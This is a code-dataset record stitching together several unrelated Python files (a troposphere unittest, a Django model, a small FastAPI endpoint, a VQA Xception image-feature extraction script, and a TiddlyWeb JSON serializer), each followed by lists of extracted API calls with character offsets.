'lvmcam.araviscam.aravis.Aravis.get_device_id', 'Aravis.get_device_id', (['i'], {}), '(i)\n', (4503, 4506), False, 'from lvmcam.araviscam.aravis import Aravis\n'), ((4765, 4786), 'lvmcam.araviscam.aravis.Aravis.Camera.new', 'Aravis.Camera.new', (['ip'], {}), '(ip)\n', (4782, 4786), False, 'from lvmcam.araviscam.aravis import Aravis\n'), ((7761, 7814), 'basecam.CameraConnectionError', 'CameraConnectionError', (["('SN ' + uid + ' not connected')"], {}), "('SN ' + uid + ' not connected')\n", (7782, 7814), False, 'from basecam import CameraSystem, BaseCamera, CameraEvent, CameraConnectionError, models, ExposureError\n'), ((8218, 8257), 'basecam.CameraConnectionError', 'CameraConnectionError', (['""" not connected"""'], {}), "(' not connected')\n", (8239, 8257), False, 'from basecam import CameraSystem, BaseCamera, CameraEvent, CameraConnectionError, models, ExposureError\n'), ((8157, 8182), 'lvmcam.araviscam.aravis.Aravis.get_device_id', 'Aravis.get_device_id', (['idx'], {}), '(idx)\n', (8177, 8182), False, 'from lvmcam.araviscam.aravis import Aravis\n')]
|
import unittest
from troposphere import Parameter, Ref
class TestInitArguments(unittest.TestCase):
def test_title_max_length(self):
title = "i" * 256
with self.assertRaises(ValueError):
Parameter(title, Type="String")
def test_ref_can_be_requested(self):
param = Parameter("title", Type="String")
reference = param.ref()
self.assertIsInstance(reference, Ref)
self.assertDictEqual(reference.data, {"Ref": "title"})
if __name__ == "__main__":
unittest.main()
|
[
"unittest.main",
"troposphere.Parameter"
] |
[((520, 535), 'unittest.main', 'unittest.main', ([], {}), '()\n', (533, 535), False, 'import unittest\n'), ((311, 344), 'troposphere.Parameter', 'Parameter', (['"""title"""'], {'Type': '"""String"""'}), "('title', Type='String')\n", (320, 344), False, 'from troposphere import Parameter, Ref\n'), ((221, 252), 'troposphere.Parameter', 'Parameter', (['title'], {'Type': '"""String"""'}), "(title, Type='String')\n", (230, 252), False, 'from troposphere import Parameter, Ref\n')]
|
from django.db import models
from .Auditable import Auditable
from .Credential import Credential
class Name(Auditable):
reindex_related = ['credential']
credential = models.ForeignKey(Credential, related_name="names", on_delete=models.CASCADE)
text = models.TextField(null=True)
language = models.TextField(null=True)
class Meta:
db_table = "name"
ordering = ('id',)
|
[
"django.db.models.ForeignKey",
"django.db.models.TextField"
] |
[((179, 256), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Credential'], {'related_name': '"""names"""', 'on_delete': 'models.CASCADE'}), "(Credential, related_name='names', on_delete=models.CASCADE)\n", (196, 256), False, 'from django.db import models\n'), ((268, 295), 'django.db.models.TextField', 'models.TextField', ([], {'null': '(True)'}), '(null=True)\n', (284, 295), False, 'from django.db import models\n'), ((311, 338), 'django.db.models.TextField', 'models.TextField', ([], {'null': '(True)'}), '(null=True)\n', (327, 338), False, 'from django.db import models\n')]
|
from fastapi import FastAPI, Request
from fastapi.middleware.cors import CORSMiddleware
from pydantic import BaseModel
class Input(BaseModel):
method: str
params: dict = {}
locale: str = 'en'
token: str = None
app = FastAPI(title='Web app API')
app.add_middleware(
CORSMiddleware,
allow_origins=["*"],
allow_credentials=True,
allow_methods=["*"],
allow_headers=["*"],
)
@app.post('/')
async def api(data: Input, request: Request):
print(data, request.client.host, request.client.port)
return {'error': 0, 'result': {'data': 'result'}}
if __name__ == '__main__':
import uvicorn
uvicorn.run('app:app', host='0.0.0.0', port=5000, reload=True)
|
[
"uvicorn.run",
"fastapi.FastAPI"
] |
[((224, 252), 'fastapi.FastAPI', 'FastAPI', ([], {'title': '"""Web app API"""'}), "(title='Web app API')\n", (231, 252), False, 'from fastapi import FastAPI, Request\n'), ((620, 682), 'uvicorn.run', 'uvicorn.run', (['"""app:app"""'], {'host': '"""0.0.0.0"""', 'port': '(5000)', 'reload': '(True)'}), "('app:app', host='0.0.0.0', port=5000, reload=True)\n", (631, 682), False, 'import uvicorn\n')]
|
import json
from collections import Counter
import re
from VQA.PythonHelperTools.vqaTools.vqa import VQA
import random
import numpy as np
from keras.preprocessing.image import load_img, img_to_array, ImageDataGenerator
from matplotlib import pyplot as plt
import os
import VQAModel
from keras.applications.xception import decode_predictions, preprocess_input
# from keras.applications.inception_v3 import decode_predictions, preprocess_input
from PIL import Image, ImageOps
from matplotlib import pyplot as plt
import math
from Environment import DATADIR
versionType = 'v2_' # this should be '' when using VQA v2.0 dataset
taskType = 'OpenEnded' # 'OpenEnded' only for v2.0. 'OpenEnded' or 'MultipleChoice' for v1.0
dataType = 'mscoco' # 'mscoco' only for v1.0. 'mscoco' for real and 'abstract_v002' for abstract for v1.0.
dataSubType = 'train2014'
saveDir = 'preprocessed_xcep_24'
annFile = '%s/Annotations/%s%s_%s_annotations.json' % (DATADIR, versionType, dataType, dataSubType)
quesFile = '%s/Questions/%s%s_%s_%s_questions.json' % (DATADIR, versionType, taskType, dataType, dataSubType)
imgDir = '%s/Images/%s/' % (DATADIR, dataSubType)
i = 0
directory = os.fsencode(imgDir)
# 363, 555
# 427, 619
size1 = 299+64
size2 = 299+64
model = VQAModel.createModelXception((size1, size2, 3))
model.summary()
for file in os.listdir(directory):
filename = os.fsdecode(file)
if filename.endswith(".jpg"):
imgPath = os.path.join(imgDir, filename)
id = int(filename[-16:-4])
img = load_img(imgPath)
width, height = img.size
if(width >= height):
img = img.resize((size2, size1), resample=Image.BICUBIC)
img_array = img_to_array(img)
img_array = preprocess_input(img_array)
# img_array = np.tile(img,(32,1,1,1))
img_array = np.expand_dims(img_array, axis=0)
predictions = model.predict(img_array)
pred = predictions[0].reshape(24,2048)
np.save(imgDir+saveDir+"/"+str(id), pred)
if i < 1000 and i%100 == 0:
print(i)
if i % 1000 == 0:
print(i)
i += 1
model = VQAModel.createModelXception((size2, size1, 3))
for file in os.listdir(directory):
filename = os.fsdecode(file)
if filename.endswith(".jpg"):
imgPath = os.path.join(imgDir, filename)
id = int(filename[-16:-4])
img = load_img(imgPath)
width, height = img.size
if(width < height):
img = img.resize((size1, size2), resample=Image.BICUBIC)
img_array = img_to_array(img)
img_array = preprocess_input(img_array)
# img_array = np.tile(img,(32,1,1,1))
img_array = np.expand_dims(img_array, axis=0)
# plt.imshow((img_array[0] + 1)/2)
# plt.show()
predictions = model.predict(img_array)
pred = predictions[0].reshape(24,2048)
np.save(imgDir+saveDir+"/"+str(id), pred)
if i % 1000 == 0:
print(i)
i += 1
|
[
"os.fsdecode",
"keras.applications.xception.preprocess_input",
"numpy.expand_dims",
"keras.preprocessing.image.img_to_array",
"keras.preprocessing.image.load_img",
"os.fsencode",
"os.path.join",
"os.listdir",
"VQAModel.createModelXception"
] |
[((1165, 1184), 'os.fsencode', 'os.fsencode', (['imgDir'], {}), '(imgDir)\n', (1176, 1184), False, 'import os\n'), ((1248, 1295), 'VQAModel.createModelXception', 'VQAModel.createModelXception', (['(size1, size2, 3)'], {}), '((size1, size2, 3))\n', (1276, 1295), False, 'import VQAModel\n'), ((1324, 1345), 'os.listdir', 'os.listdir', (['directory'], {}), '(directory)\n', (1334, 1345), False, 'import os\n'), ((2167, 2214), 'VQAModel.createModelXception', 'VQAModel.createModelXception', (['(size2, size1, 3)'], {}), '((size2, size1, 3))\n', (2195, 2214), False, 'import VQAModel\n'), ((2227, 2248), 'os.listdir', 'os.listdir', (['directory'], {}), '(directory)\n', (2237, 2248), False, 'import os\n'), ((1362, 1379), 'os.fsdecode', 'os.fsdecode', (['file'], {}), '(file)\n', (1373, 1379), False, 'import os\n'), ((2265, 2282), 'os.fsdecode', 'os.fsdecode', (['file'], {}), '(file)\n', (2276, 2282), False, 'import os\n'), ((1432, 1462), 'os.path.join', 'os.path.join', (['imgDir', 'filename'], {}), '(imgDir, filename)\n', (1444, 1462), False, 'import os\n'), ((1512, 1529), 'keras.preprocessing.image.load_img', 'load_img', (['imgPath'], {}), '(imgPath)\n', (1520, 1529), False, 'from keras.preprocessing.image import load_img, img_to_array, ImageDataGenerator\n'), ((2335, 2365), 'os.path.join', 'os.path.join', (['imgDir', 'filename'], {}), '(imgDir, filename)\n', (2347, 2365), False, 'import os\n'), ((2415, 2432), 'keras.preprocessing.image.load_img', 'load_img', (['imgPath'], {}), '(imgPath)\n', (2423, 2432), False, 'from keras.preprocessing.image import load_img, img_to_array, ImageDataGenerator\n'), ((1685, 1702), 'keras.preprocessing.image.img_to_array', 'img_to_array', (['img'], {}), '(img)\n', (1697, 1702), False, 'from keras.preprocessing.image import load_img, img_to_array, ImageDataGenerator\n'), ((1727, 1754), 'keras.applications.xception.preprocess_input', 'preprocess_input', (['img_array'], {}), '(img_array)\n', (1743, 1754), False, 'from keras.applications.xception import decode_predictions, preprocess_input\n'), ((1829, 1862), 'numpy.expand_dims', 'np.expand_dims', (['img_array'], {'axis': '(0)'}), '(img_array, axis=0)\n', (1843, 1862), True, 'import numpy as np\n'), ((2587, 2604), 'keras.preprocessing.image.img_to_array', 'img_to_array', (['img'], {}), '(img)\n', (2599, 2604), False, 'from keras.preprocessing.image import load_img, img_to_array, ImageDataGenerator\n'), ((2629, 2656), 'keras.applications.xception.preprocess_input', 'preprocess_input', (['img_array'], {}), '(img_array)\n', (2645, 2656), False, 'from keras.applications.xception import decode_predictions, preprocess_input\n'), ((2731, 2764), 'numpy.expand_dims', 'np.expand_dims', (['img_array'], {'axis': '(0)'}), '(img_array, axis=0)\n', (2745, 2764), True, 'import numpy as np\n')]
|
"""
JSON based serializer.
"""
import simplejson
from base64 import b64encode, b64decode
from tiddlyweb.serializations import SerializationInterface
from tiddlyweb.model.bag import Bag
from tiddlyweb.model.policy import Policy
class Serialization(SerializationInterface):
"""
Turn various entities to and from JSON.
"""
def list_recipes(self, recipes):
"""
Create a JSON list of recipe names from
the provided recipes.
"""
return simplejson.dumps([recipe.name for recipe in recipes])
def list_bags(self, bags):
"""
Create a JSON list of bag names from the
provided bags.
"""
return simplejson.dumps([bag.name for bag in bags])
def list_tiddlers(self, bag):
"""
List the tiddlers in a bag as JSON.
The format is a list of dicts in
the form described by self._tiddler_dict.
"""
return simplejson.dumps([self._tiddler_dict(tiddler) for tiddler in bag.list_tiddlers()])
def recipe_as(self, recipe):
"""
A recipe as a JSON dictionary.
"""
policy = recipe.policy
policy_dict = {}
for key in ['owner', 'read', 'write', 'create', 'delete', 'manage']:
policy_dict[key] = getattr(policy, key)
return simplejson.dumps(dict(desc=recipe.desc, policy=policy_dict, recipe=recipe.get_recipe()))
def as_recipe(self, recipe, input_string):
"""
Turn a JSON dictionary into a Recipe
if it is in the proper form. Include
the policy.
"""
info = simplejson.loads(input_string)
try:
recipe.set_recipe(info['recipe'])
recipe.desc = info['desc']
if info['policy']:
recipe.policy = Policy()
for key, value in info['policy'].items():
recipe.policy.__setattr__(key, value)
except KeyError:
pass
return recipe
def bag_as(self, bag):
"""
Create a JSON dictionary representing
a Bag and Policy.
"""
policy = bag.policy
policy_dict = {}
for key in ['owner', 'read', 'write', 'create', 'delete', 'manage']:
policy_dict[key] = getattr(policy, key)
info = dict(policy=policy_dict, desc=bag.desc)
return simplejson.dumps(info)
def as_bag(self, bag, input_string):
"""
Turn a JSON string into a bag.
"""
info = simplejson.loads(input_string)
if info['policy']:
bag.policy = Policy()
for key, value in info['policy'].items():
bag.policy.__setattr__(key, value)
bag.desc = info.get('desc', '')
return bag
def tiddler_as(self, tiddler):
"""
Create a JSON dictionary representing
a tiddler, as described by _tiddler_dict
plus the text of the tiddler.
"""
tiddler_dict = self._tiddler_dict(tiddler)
if tiddler.type and tiddler.type != 'None':
tiddler_dict['text'] = b64encode(tiddler.text)
else:
tiddler_dict['text'] = tiddler.text
return simplejson.dumps(tiddler_dict)
def as_tiddler(self, tiddler, input_string):
"""
Turn a JSON dictionary into a Tiddler.
"""
dict_from_input = simplejson.loads(input_string)
accepted_keys = ['created', 'modified', 'modifier', 'tags', 'fields', 'text', 'type']
for key, value in dict_from_input.iteritems():
if value and key in accepted_keys:
setattr(tiddler, key, value)
if tiddler.type and tiddler.type != 'None':
tiddler.text = b64decode(tiddler.text)
return tiddler
def _tiddler_dict(self, tiddler):
"""
Select fields from a tiddler to create
a dictonary.
"""
unwanted_keys = ['text', 'store']
wanted_keys = [attribute for attribute in tiddler.slots if attribute not in unwanted_keys]
wanted_info = {}
for attribute in wanted_keys:
wanted_info[attribute] = getattr(tiddler, attribute, None)
wanted_info['permissions'] = self._tiddler_permissions(tiddler)
try:
fat = self.environ['tiddlyweb.query'].get('fat', [None])[0]
if fat:
wanted_info['text'] = tiddler.text
except KeyError:
pass # tiddlyweb.query is not there
return dict(wanted_info)
def _tiddler_permissions(self, tiddler):
"""
Make a list of the permissions the current user has
on this tiddler.
"""
perms = []
bag = Bag(tiddler.bag)
if tiddler.store:
bag = tiddler.store.get(bag)
if 'tiddlyweb.usersign' in self.environ:
perms = bag.policy.user_perms(self.environ['tiddlyweb.usersign'])
return perms
|
[
"simplejson.dumps",
"tiddlyweb.model.bag.Bag",
"base64.b64decode",
"tiddlyweb.model.policy.Policy",
"base64.b64encode",
"simplejson.loads"
] |
[((492, 545), 'simplejson.dumps', 'simplejson.dumps', (['[recipe.name for recipe in recipes]'], {}), '([recipe.name for recipe in recipes])\n', (508, 545), False, 'import simplejson\n'), ((689, 733), 'simplejson.dumps', 'simplejson.dumps', (['[bag.name for bag in bags]'], {}), '([bag.name for bag in bags])\n', (705, 733), False, 'import simplejson\n'), ((1609, 1639), 'simplejson.loads', 'simplejson.loads', (['input_string'], {}), '(input_string)\n', (1625, 1639), False, 'import simplejson\n'), ((2366, 2388), 'simplejson.dumps', 'simplejson.dumps', (['info'], {}), '(info)\n', (2382, 2388), False, 'import simplejson\n'), ((2509, 2539), 'simplejson.loads', 'simplejson.loads', (['input_string'], {}), '(input_string)\n', (2525, 2539), False, 'import simplejson\n'), ((3198, 3228), 'simplejson.dumps', 'simplejson.dumps', (['tiddler_dict'], {}), '(tiddler_dict)\n', (3214, 3228), False, 'import simplejson\n'), ((3376, 3406), 'simplejson.loads', 'simplejson.loads', (['input_string'], {}), '(input_string)\n', (3392, 3406), False, 'import simplejson\n'), ((4703, 4719), 'tiddlyweb.model.bag.Bag', 'Bag', (['tiddler.bag'], {}), '(tiddler.bag)\n', (4706, 4719), False, 'from tiddlyweb.model.bag import Bag\n'), ((2592, 2600), 'tiddlyweb.model.policy.Policy', 'Policy', ([], {}), '()\n', (2598, 2600), False, 'from tiddlyweb.model.policy import Policy\n'), ((3096, 3119), 'base64.b64encode', 'b64encode', (['tiddler.text'], {}), '(tiddler.text)\n', (3105, 3119), False, 'from base64 import b64encode, b64decode\n'), ((3727, 3750), 'base64.b64decode', 'b64decode', (['tiddler.text'], {}), '(tiddler.text)\n', (3736, 3750), False, 'from base64 import b64encode, b64decode\n'), ((1801, 1809), 'tiddlyweb.model.policy.Policy', 'Policy', ([], {}), '()\n', (1807, 1809), False, 'from tiddlyweb.model.policy import Policy\n')]
|